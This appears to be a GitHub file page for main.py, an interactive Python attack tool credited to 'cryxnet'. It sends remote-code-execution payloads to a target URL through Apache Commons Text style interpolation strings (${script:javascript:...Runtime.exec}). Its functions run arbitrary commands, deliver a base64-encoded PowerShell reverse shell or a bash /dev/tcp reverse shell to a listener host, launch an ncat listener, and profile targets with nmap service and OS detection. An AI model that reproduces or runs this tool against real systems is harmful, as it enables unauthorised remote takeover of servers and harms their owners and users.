-
Notifications
You must be signed in to change notification settings - Fork 2
/
main.py
146 lines (114 loc) · 5.91 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
import os
import requests
import colorama
import base64
import nmap
name = """
@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@
@@@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@@ @@@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@
@@! @@! @@! !@@ @@! @@!@! !@@ @@! @@@ @@! @@! @@!
!@! !@! !@! @!! !@! !@!!@! !@! !@! @!@ !@! !@! !@!
@!! @!!!:! !@@!@! @!! @!! @!! !!@@!! @!@!@!@! @!!!:! @!! @!!
!!! !!!!!: @!!! !!! !!! !@! !!@!!! !!!@!!!! !!!!!: !!! !!!
!!: !!: !: :!! !!: :!!:!:!!: !:! !!: !!! !!: !!: !!:
:!: :!: :!: !:! :!: !:::!!::: !:! :!: !:! :!: :!: :!:
:: :: :::: :: ::: :: ::: :::: :: :: ::: :: :::: :: :::: :: ::::
: : :: :: : :: : ::: :: : : : : : : :: :: : :: : : : :: : :
<< #~by cryxnet~: >>
"""
colorama.init(autoreset=True)
payloads = {
"script": "${script:javascript:java.lang.Runtime.getRuntime().exec('SHELLCODE')}",
"url": "${url:UTF-8:java.lang.Runtime.getRuntime().exec('SHELLCODE')}",
"dns": "${dns:address:java.lang.Runtime.getRuntime().exec('SHELLCODE')}"
}
powershellRevshell = '$client = New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
bashRevshell = "sh -i >& /dev/tcp/LHOST/LPORT 0>&1"
scanner = nmap.PortScanner()
def run(url, command, payloadType):
pld = "{script:javascript:java.lang.Runtime.getRuntime().exec('SHELLCODE')}" # default
cmd = "echo H3110 W0RLD" # default
if payloadType == "URL":
pld = payloads.get("url")
elif payloadType == "DNS":
pld = payloads.get("dns")
if not command == "":
cmd = command
payload = pld.replace('SHELLCODE', cmd)
result = requests.get(url + "=" + payload)
return result
def revshell(url, lhost, lport, system, payloadType):
command = ""
if system == "WINDOWS":
base64Code = base64.b64encode(bytes(powershellRevshell.replace('LHOST', lhost).replace('LPORT', lport), encoding='utf-8')).decode("utf-8")
command = 'powershell -e %s' % base64Code
else:
command = bashRevshell.replace('LHOST', lhost).replace('LPORT', lport)
return run(url, command, payloadType)
def scan(ipaddr):
return scanner.scan(hosts=ipaddr, arguments='-sV -O')
def parseScan(output, ipaddr):
rawScan = output["scan"][ipaddr]
hostname = rawScan["hostnames"][0]["name"]
ipaddr = rawScan["addresses"]["ipv4"]
vendor = rawScan["vendor"]
uptime = rawScan["uptime"]["lastboot"]
os = rawScan["osmatch"][0]["name"]
portscan = rawScan["tcp"]
portscanString = ""
for key in portscan.keys():
portscanString += f"""
- - - - - - - - - - - - - - - - - - -
Port: {key}
State: {portscan[key]["state"]}
Reason: {portscan[key]["reason"]}
Name: {portscan[key]["name"]}
Product: {portscan[key]["product"]}
Version: {portscan[key]["version"]}
CPE: {portscan[key]["state"]}
- - - - - - - - - - - - - - - - - - -
"""
return f"""
Scan Result of {ipaddr}
========================
Hostname: {hostname}
Vendor: {vendor}
Uptime: {uptime}
OS: {os}
========================
Ports:
------------------------
{portscanString}
"""
def startRevshellListener(lhost, lport):
os.system("start ncat -lvnp %s" % (lport))
if __name__ == '__main__':
print(colorama.Fore.RED + name + "\n")
while True:
print(colorama.Fore.RED + """
[0] Scan target informations
[1] Execute customized shell command
[2] Execute Reverseshell
\n
""")
mId = int(input(colorama.Fore.CYAN + "#~ Enter Number >> "))
if mId == 0:
ipaddr = input(colorama.Fore.BLUE + "#~ Enter IP-Address of target >> ")
print(colorama.Fore.BLUE + "[+] Scanning Target")
print(colorama.Fore.YELLOW + "[INFO] Scan can take up to 3 minutes and more")
print(parseScan(scan(ipaddr), ipaddr))
elif mId == 1:
url = input("#~ Enter URL of target >> ")
command = input("#~ Enter command [enter for default: echo] >> ")
payloadType = input("#~ Enter the type of payload [enter for default: script] >> ")
print(colorama.Fore.BLUE + "[+] Running attack")
print(run(url, command, payloadType))
elif mId == 2:
url = input("#~ Enter URL of target >> ")
lhost = input("#~ Enter IP-Address of listener host >> ")
lport = input("#~ Enter PORT of listener host >> ")
system = input("#~ Enter system os of target >> ")
payloadType = input("#~ Enter the type of payload [enter for default: script] >> ")
print(colorama.Fore.BLUE + "[+] Executing RCE Revshell Attack")
startRevshellListener(lhost, lport)
print(revshell(url, lhost, lport, system, payloadType))